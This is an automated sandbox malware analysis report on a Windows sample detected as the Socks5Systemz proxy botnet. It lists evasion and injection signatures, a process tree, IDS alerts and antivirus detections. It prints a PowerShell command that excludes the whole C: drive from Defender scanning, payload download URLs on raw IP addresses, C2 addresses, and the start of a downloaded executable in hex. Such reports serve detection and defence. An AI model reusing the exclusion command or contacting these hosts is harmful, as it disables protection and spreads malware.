
Windows Analysis Report
dxRwXy19pq.exe

Overview

General Information

Sample name: dxRwXy19pq.exe (renamed because the original name is a hash value)
Original sample name: 87ce4dd757d1ff7d2755b42a9e021784.exe
Analysis ID: 1632175
MD5: 87ce4dd757d1ff7d2755b42a9e021784
SHA1: ae967c99b1f1cb07191cb1d1482f8ce56cd106db
SHA256: 44381dcaf3805730f78eef801218182b308d5ef4d712a5636315f09f2a5e0065
Tags: exe, user-abuse_ch

Detection

Socks5Systemz
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Socks5Systemz
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to infect the boot sector
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has a writeable .text section
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • dxRwXy19pq.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\dxRwXy19pq.exe" MD5: 87CE4DD757D1FF7D2755B42A9E021784)
    • ded120f6-6c1d-18da-bc8d-0195720b2895.exe (PID: 6884 cmdline: "C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe" MD5: A875EFEC27F37FB4E42141BBA8771C65)
      • vbc.exe (PID: 3288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe MD5: A526DE1F9DE51E1ACBC6B8A492673174)
        • powershell.exe (PID: 7196 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7444 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 873bfcef-4c55-422e-88ba-1a31e36a0f58.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe" MD5: 836220DE6E7653554717D2CA5C73F98E)
      • 873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp" /SL5="$303D6,3759395,56832,C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe" MD5: 5B423B3A38BD502496B29853EC88923B)
        • photorecoverylib59.exe (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe" -i MD5: 8938736B03801821146F1A0365C937F4)
  • svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5612 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 332 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 3276 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7936 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Yara matches (Source, Rule, Description, Author):
Source: 0000000E.00000002.2472564067.0000000002C86000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Author: Joe Security
Source: 0000000E.00000002.2472654579.0000000002D31000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7196, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security
Source: Process Memory Space: photorecoverylib59.exe PID: 7424, Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7444, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 3288, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7196, ProcessName: powershell.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe, ParentProcessId: 3288, ParentProcessName: vbc.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7196, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 6924, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T20:18:15.102079+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49687 | 91.240.118.49 | 443 | TCP
2025-03-07T20:19:18.905080+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:25.339606+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49720 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:28.661592+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49721 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:32.233098+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49723 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:35.222327+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49724 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:38.445446+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49725 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:41.916959+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49726 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:45.067068+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49727 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:48.395615+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49728 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:52.074027+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49729 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:55.760999+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49730 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:58.779498+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49731 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:02.256685+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49732 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:05.391590+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49733 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:09.033789+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49734 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:12.497160+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49735 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:15.627870+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.6 | 49736 | 176.113.115.96 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T20:18:10.134150+0100 | 2022550 | 1 | A Network Trojan was detected | 192.168.2.6 | 49684 | 104.168.28.10 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T20:19:20.359099+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49718 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:26.330980+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49720 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:29.581029+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49721 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:32.989033+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49723 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:36.006101+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49724 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:39.395563+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49725 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:42.695310+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49726 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:45.896707+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49727 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:49.792814+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49728 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:53.393684+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49729 | 176.113.115.96 | 443 | TCP
2025-03-07T20:19:56.518810+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49730 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:00.057270+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49731 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:03.059024+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49732 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:06.447963+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49733 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:10.241878+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49734 | 176.113.115.96 | 443 | TCP
2025-03-07T20:20:13.298122+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49735 | 176.113.115.96 | 443 | TCP


AV Detection

Source: dxRwXy19pq.exe, Avira: detected
Source: https://91.240.118.49/forsale/silk.exe, Avira URL Cloud: Label: malware
Source: https://91.240.118.49/forsale/silk.exe/, Avira URL Cloud: Label: malware
Source: http://104.168.28.10/001.exe, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe, Avira: detection malicious, Label: TR/Kryptik.zlcio
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exe, Avira: detection malicious, Label: TR/Kryptik.zlcio
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\001[1].exe, ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe, ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy), ReversingLabs: Detection: 72%
Source: C:\Windows\Temp\VzUtW_3288.sys, ReversingLabs: Detection: 54%
Source: dxRwXy19pq.exe, Virustotal: Detection: 72%
Source: dxRwXy19pq.exe, ReversingLabs: Detection: 65%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 13_2_0045D230
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_0045D2E4 ArcFourCrypt, 13_2_0045D2E4
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_0045D2FC ArcFourCrypt, 13_2_0045D2FC
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_10001000 ISCryptGetVersion, 13_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_10001130 ArcFourCrypt, 13_2_10001130
Source: vbc.exe, 00000005.00000002.1371160311.000000014007F000.00000002.00000400.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_ac6672e3-e

Compliance

Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe, Unpacked PE file: 14.2.photorecoverylib59.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Recovery Library_is1
Source: unknown, HTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.6:49687 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_00452AD4 FindFirstFileA,GetLastError, 13_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_00475798 FindFirstFileA,FindNextFileA,FindClose, 13_2_00475798
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 13_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 13_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose, 13_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp, Code function: 13_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 13_2_00498FDC
Source: C:\Users\user\Desktop\dxRwXy19pq.exe, Code function: 4x nop then mov rax, qword ptr [rcx+10h], 0_2_00425949
Source: C:\Users\user\Desktop\dxRwXy19pq.exe, Code function: 4x nop then mov qword ptr [rcx+08h], rdx, 0_2_00488D60
Source: global traffic, TCP traffic: 192.168.2.6:49719 -> 45.93.20.230:2024
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 07 Mar 2025 19:18:10 GMTContent-Type: application/octet-streamContent-Length: 3161088Last-Modified: Thu, 12 Dec 2024 15:33:20 GMTConnection: keep-aliveETag: "675b0240-303c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 c0 91 5a 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 b4 2f 00 00 86 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 2f 00 8c 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 91 b3 2f 00 00 20 00 00 00 b4 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 8c 85 00 00 00 e0 2f 00 00 86 00 00 00 b6 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 48 00 00 20 46 00 00 09 00 00 00 3d 00 00 06 30 8e 00 00 61 45 2f 00 90 47 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 50 00 00 00 01 00 00 11 16 2b 40 7e 24 00 00 04 2b 3c 2b 41 06 2c 1a 7e 25 00 00 04 7e 01 00 00 04 20 a0 00 00 00 28 81 00 00 06 28 91 00 00 06 2a 7e 25 00 00 04 7e 01 00 00 04 20 bd 00 00 00 28 81 00 00 06 28 91 00 00 06 2a 0a 2b bd 28 8e 00 00 06 2b bd 0a 2b bc 1e 02 28 4f 00 00 0a 2a 62 d0 02 00 00 02 2b 03 2b 08 2a 28 2d 00 00 0a 2b f6 28 86 00 00 06 2b f1 00 00 00 13 30 04 00 c3 00 00 00 02 00 00 11 12 00 18 1f 14 16 38 9a 00 00 00 12 01 18 1f 13 16 38 99 00 00 00 12 02 18 1f 13 16 38 98 00 00 00 7e 26 00 00 04 06 07 28 94 00 00 06 2c 1b 7e 25 00 00 04 7e 02 00 00 04 20 df 00 00 00 28 81 00 00 06 28 91 00 00 06 2b 19 7e 25 00 00 04 7e 02 00 00 04 20 1c 01 00 00 28 81 00 00 06 28 91 00 00 06 7e 26 00 00 04 07 08 28 94 00 00 06 2c 1a 7e 25 00 00 04 7e 02 00 00 04 20 5d 01 00 00 28 81 00 00 06 28 91 00 00 06 2a 7e 25 00 00 04 7e 02 00 00 04 20 9a 01 00 00 28 81 00 00 06 28 91 00 00 06 2a 28 50 00 00 0a 38 5c ff ff ff 28 50 00 00 0a 38 5d ff ff ff 28 50
Source: Joe Sandbox View, IP Address: 176.113.115.96
Source: Joe Sandbox View, IP Address: 104.168.28.10
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network traffic, Suricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.6:49684 -> 104.168.28.10:80
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49687 -> 91.240.118.49:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49718 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49721 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49725 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49732 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49729 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49733 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49734 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49736 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49727 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49724 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49723 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49731 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49735 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49720 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49726 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49730 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49728 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49718 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49724 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49733 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49732 -> 176.113.115.96:443
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49729 -> 176.113.115.96:443
